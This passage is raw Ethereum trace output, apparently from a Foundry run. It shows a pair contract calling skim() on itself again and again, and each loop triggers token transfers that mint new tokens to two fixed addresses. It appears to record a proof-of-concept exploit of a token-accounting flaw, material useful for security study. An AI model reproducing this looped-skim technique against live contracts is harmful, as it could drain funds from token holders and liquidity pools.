    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 297345983008613 [2.973e14])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 46356982116000 [4.635e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 46356982116000 [4.635e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x106b8d50a965c2aa88685b11b02d7360bc7fa64e11a5ff7e64809d7d8b3dca4b → 0x11945996437b9fb4695c2227b34f33b5148b2049fa22f42a99bf8f950e11002b
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x106b8d50a965c2aa88685b11b02d7360bc7fa64e11a5ff7e64809d7d8b3dca4b → 0x11945996437b9fb4695c2227b34f33b5148b2049fa22f42a99bf8f950e11002b
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x0000000000000000000000000000000000000000000000000001fa0329ea6b16 → 0x000000000000000000000000000000000000000000000000000264c969ded52d
    │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000002352ce91c9e185 → 0x0000000000000000000000000000000000000000000000000029e9439bdd2a90
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 799421613682222 [7.994e14]
    │   │   │   │   └─ ← [Return] 799421613682222 [7.994e14]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 423001415854182 [4.23e14])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 423001415854182 [4.23e14]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 799421613682222 [7.994e14]
    │   │   │   │   │   │   └─ ← [Return] 799421613682222 [7.994e14]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 423001415854182 [4.23e14])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 43917064497520 [4.391e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 43917064497520 [4.391e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x11945996437b9fb4695c2227b34f33b5148b2049fa22f42a99bf8f950e11002b → 0x1281548ee601877ed8c13bc658b580f94a0f583d6c75588ff92e8bcb0ebe3bab
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x11945996437b9fb4695c2227b34f33b5148b2049fa22f42a99bf8f950e11002b → 0x1281548ee601877ed8c13bc658b580f94a0f583d6c75588ff92e8bcb0ebe3bab
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x000000000000000000000000000000000000000000000000000264c969ded52d → 0x0000000000000000000000000000000000000000000000000002d711d94f2e2e
    │   │   │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000029e9439bdd2a90 → 0x000000000000000000000000000000000000000000000000003026f52505a430
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 918463395455977 [9.184e14]
    │   │   │   │   └─ ← [Return] 918463395455977 [9.184e14]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 542043197627937 [5.42e14])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 542043197627937 [5.42e14]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 918463395455977 [9.184e14]
    │   │   │   │   │   │   └─ ← [Return] 918463395455977 [9.184e14]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 542043197627937 [5.42e14])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 39039306201158 [3.903e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 39039306201158 [3.903e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x1281548ee601877ed8c13bc658b580f94a0f583d6c75588ff92e8bcb0ebe3bab → 0x1338afb2e8463f1777c44d97defd5ff4d5726bbbedd3441e09b5fd7f969e1fcf
    │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000003026f52505a430 → 0x0000000000000000000000000000000000000000000000000035b33304286f23
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x1281548ee601877ed8c13bc658b580f94a0f583d6c75588ff92e8bcb0ebe3bab → 0x1338afb2e8463f1777c44d97defd5ff4d5726bbbedd3441e09b5fd7f969e1fcf
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x0000000000000000000000000000000000000000000000000002d711d94f2e2e → 0x000000000000000000000000000000000000000000000000000343566c6ce3e9
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1024283504850115 [1.024e15]
    │   │   │   │   └─ ← [Return] 1024283504850115 [1.024e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 647863307022075 [6.478e14])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 647863307022075 [6.478e14]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1024283504850115 [1.024e15]
    │   │   │   │   │   │   └─ ← [Return] 1024283504850115 [1.024e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 647863307022075 [6.478e14])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 34545691188684 [3.454e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 34545691188684 [3.454e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x000000000000000000000000000000000000000000000000000343566c6ce3e9 → 0x0000000000000000000000000000000000000000000000000003a3949674b4c3
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x1338afb2e8463f1777c44d97defd5ff4d5726bbbedd3441e09b5fd7f969e1fcf → 0x13ca2cc0a1da03acbe8930878c360f2b873f2c3d63a0f2b38c97600c4b2c5e83
    │   │   │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000035b33304286f23 → 0x000000000000000000000000000000000000000000000000003a9bf6d63b171a
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x1338afb2e8463f1777c44d97defd5ff4d5726bbbedd3441e09b5fd7f969e1fcf → 0x13ca2cc0a1da03acbe8930878c360f2b873f2c3d63a0f2b38c97600c4b2c5e83
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1117923202283423 [1.117e15]
    │   │   │   │   └─ ← [Return] 1117923202283423 [1.117e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 741503004455383 [7.415e14])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 741503004455383 [7.415e14]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1117923202283423 [1.117e15]
    │   │   │   │   │   │   └─ ← [Return] 1117923202283423 [1.117e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 741503004455383 [7.415e14])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 30112437010933 [3.011e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 30112437010933 [3.011e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x13ca2cc0a1da03acbe8930878c360f2b873f2c3d63a0f2b38c97600c4b2c5e83 → 0x143e5ec524398b3d1b0dd4df8ec8b4adab65c3ded8f1c58e44f117064337bc62
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x0000000000000000000000000000000000000000000000000003a3949674b4c3 → 0x0000000000000000000000000000000000000000000000000003f8bec75bb79f
    │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000003a9bf6d63b171a → 0x000000000000000000000000000000000000000000000000003ee372c2af6566
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x13ca2cc0a1da03acbe8930878c360f2b873f2c3d63a0f2b38c97600c4b2c5e83 → 0x143e5ec524398b3d1b0dd4df8ec8b4adab65c3ded8f1c58e44f117064337bc62
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1199546102091168 [1.199e15]
    │   │   │   │   └─ ← [Return] 1199546102091168 [1.199e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 823125904263128 [8.231e14])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 823125904263128 [8.231e14]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1199546102091168 [1.199e15]
    │   │   │   │   │   │   └─ ← [Return] 1199546102091168 [1.199e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 823125904263128 [8.231e14])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 26342086751180 [2.634e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 26342086751180 [2.634e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x0000000000000000000000000000000000000000000000000003f8bec75bb79f → 0x000000000000000000000000000000000000000000000000000442fb174e8da0
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x143e5ec524398b3d1b0dd4df8ec8b4adab65c3ded8f1c58e44f117064337bc62 → 0x149d19af5c75078e5e662cd66ad1a2ead3ac24ea9821bea9a492e79721f4132a
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x143e5ec524398b3d1b0dd4df8ec8b4adab65c3ded8f1c58e44f117064337bc62 → 0x149d19af5c75078e5e662cd66ad1a2ead3ac24ea9821bea9a492e79721f4132a
    │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000003ee372c2af6566 → 0x0000000000000000000000000000000000000000000000000042a1c48f9f7d64
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1270949074452319 [1.27e15]
    │   │   │   │   └─ ← [Return] 1270949074452319 [1.27e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 894528876624279 [8.945e14])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 894528876624279 [8.945e14]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1270949074452319 [1.27e15]
    │   │   │   │   │   │   └─ ← [Return] 1270949074452319 [1.27e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 894528876624279 [8.945e14])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 22729978755022 [2.272e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 22729978755022 [2.272e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000042a1c48f9f7d64 → 0x0000000000000000000000000000000000000000000000000045dcadfc0035b9
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x000000000000000000000000000000000000000000000000000442fb174e8da0 → 0x000000000000000000000000000000000000000000000000000483ebe41c3f5f
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x149d19af5c75078e5e662cd66ad1a2ead3ac24ea9821bea9a492e79721f4132a → 0x14ea3f9ff4f2ea426f5bb01e89ab3823a503acab6f067aa45e2e44c54ee42074
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x149d19af5c75078e5e662cd66ad1a2ead3ac24ea9821bea9a492e79721f4132a → 0x14ea3f9ff4f2ea426f5bb01e89ab3823a503acab6f067aa45e2e44c54ee42074
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
